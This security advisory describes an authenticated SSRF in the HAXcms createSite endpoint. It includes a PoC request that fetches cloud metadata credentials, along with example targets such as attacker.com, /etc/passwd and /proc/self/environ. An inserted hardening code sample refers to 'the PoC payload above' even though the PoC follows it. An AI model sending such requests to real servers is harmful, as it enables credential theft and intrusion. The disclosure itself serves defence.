VYPR
High severity · 7.1 · GHSA Advisory · Published May 19, 2026

HAXcms createSite SSRF Enables Arbitrary File Read

CVE-2026-46393

Description

Summary

An authenticated Server-Side Request Forgery (SSRF) vulnerability in HAXcms allows users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access.

Details

The createSite endpoint in HAXcms (v11.0.6) accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed without validation and ultimately fetched server-side using file_get_contents().

The data flow is as follows:

  • User input (build.files) is processed via object_to_array() into a PHP array
  • Assigned to $filesToDownload in Operations.php (line 2626)
  • Iterated over in Operations.php (line 2730), where each entry is passed to HAXCMSFile::save() with bulk-import enabled

In HAXCMSFile.php (line 30), the following occurs:

```php
file_get_contents($upload['tmp_name']);
```

Here, tmp_name is attacker-controlled and may contain:

  • External URLs (http://attacker.com)
  • Internal services (http://127.0.0.1)
  • Cloud metadata endpoints (http://169.254.169.254)
  • Local file paths (/etc/passwd, /proc/self/environ)

The bulk-import flag bypasses is_uploaded_file() validation, which normally ensures the file originates from a legitimate upload. The only restriction is an extension whitelist based on the filename (array key), which is fully attacker-controlled.

There are no restrictions on:

  • URL schemes (http, file, gopher, etc.)
  • Destination IP ranges (internal, loopback, metadata services)
  • Response content

All fetched content is written to `sites//files/` and is accessible via the web.
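The class of fix the Details section points at, written here as an added example (not HAXcms's own code): bulk-import entries are confined to a server-controlled staging directory and refused if they carry any URL scheme, and the extension whitelist is applied to a sanitized basename instead of the raw array key. The staging-directory convention, $allowedExt and all function names are assumptions.

```php
<?php
// Added example, not HAXcms code: hardened replacement for the bulk-import branch
// running file_get_contents($upload['tmp_name']). $importRoot, $allowedExt and names are assumptions.
// Resolve tmp_name to a regular file inside the staging directory; URLs, stream
// wrappers, absolute paths and symlinks escaping the root are all rejected.
function resolveImportSource(string $tmpName, string $importRoot): string
{
    // Refuse any scheme (http:, file:, gopher:, php:, phar:, data:) up front so
    // no PHP stream wrapper and no outbound request can ever be triggered.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $tmpName) === 1) {
        throw new RuntimeException('URL schemes are not allowed in tmp_name');
    }
    $root = realpath($importRoot);
    // realpath() resolves ".." and symlinks; the result must stay under $root.
    $real = realpath($importRoot . DIRECTORY_SEPARATOR . $tmpName);
    if ($root === false || $real === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0 || !is_file($real)) {
        throw new RuntimeException('tmp_name must name a staged regular file');
    }
    return $real;
}
// The extension whitelist only helps when applied to a sanitized destination
// name: the array key is attacker-controlled, so strip directories first.
function sanitizeDestinationName(string $key, array $allowedExt): string
{
    $name = basename($key);
    if ($name === '' || $name[0] === '.' || !preg_match('/^[A-Za-z0-9._-]+$/', $name)) {
        throw new RuntimeException('invalid destination filename');
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new RuntimeException("extension .$ext is not permitted");
    }
    return $name;
}
// Hardened bulk-import save: staged files only, under a checked name, copied
// with copy() instead of being fetched through file_get_contents().
function saveBulkImport(array $files, string $importRoot, string $siteDir, array $allowedExt): array
{
    $written = [];
    foreach ($files as $key => $upload) {
        $src  = resolveImportSource((string) ($upload['tmp_name'] ?? ''), $importRoot);
        $dest = $siteDir . DIRECTORY_SEPARATOR . sanitizeDestinationName((string) $key, $allowedExt);
        if (!copy($src, $dest)) {
            throw new RuntimeException("failed to write $dest");
        }
        $written[] = $dest;
    }
    return $written;
}
```

With this shape the PoC payload above fails at the scheme check before any fetch happens, and a tmp_name such as /etc/passwd or ../../etc/passwd fails the realpath confinement.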

PoC

Prerequisites:

  • Authenticated session (default credentials: admin/admin on fresh installs)
  • Valid JWT and CSRF token

Step 1: Log in and capture JWT + CSRF token

Step 2: Send crafted request:

```http
POST /createSite HTTP/1.1
Host: target
Authorization: Bearer [JWT]
X-CSRF-Token: [TOKEN]
Content-Type: application/json

{
  "site": { "name": "poc" },
  "build": {
    "files": {
      "poc.txt": {
        "tmp_name": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
      }
    }
  }
}
```

Step 3: Retrieve response: `GET /sites/poc/files/poc.txt`

The response will contain the fetched content (e.g., cloud credentials or internal service data).

Impact

  • SSRF enabling access to internal network services
  • Arbitrary file read via local filesystem paths
  • Cloud credential exposure through metadata endpoints
  • Data exfiltration via web-accessible file storage

Any authenticated user can exploit this to access sensitive server or infrastructure data, potentially leading to full system or cloud environment compromise.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated SSRF in HAXcms createSite endpoint allows arbitrary file read and internal network access via uncontrolled URL/file paths.

Vulnerability

The createSite endpoint in HAXcms v11.0.6 accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed via object_to_array() and passed to HAXCMSFile::save() with bulk-import enabled, bypassing is_uploaded_file() validation. The only restriction is an extension whitelist based on the filename key, which is attacker-controlled. [2][3]

Exploitation

An attacker with an authenticated session (default credentials admin/admin on fresh installs) can craft a POST request to /createSite with a JSON payload containing arbitrary URLs or file paths in build.files. The server fetches the resource using file_get_contents() and writes the response to sites//files/, which is web-accessible. No restrictions on URL schemes or IP ranges exist. [2][3]

Impact

An attacker can read arbitrary local files (e.g., /etc/passwd, /proc/self/environ) and access internal network services (e.g., cloud metadata endpoints at http://169.254.169.254). The fetched content is stored in a publicly accessible directory, enabling information disclosure and further internal network reconnaissance. [2][3]

Mitigation

As of the publication date, no patch has been released. The issue is tracked in the HAXcms issue repository [1]. Until a fix is available, administrators should restrict authenticated access, change default credentials, and consider network-level controls to limit outbound HTTP requests from the server. [2][3]

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 2

News mentions: 0 (no linked articles in the index yet)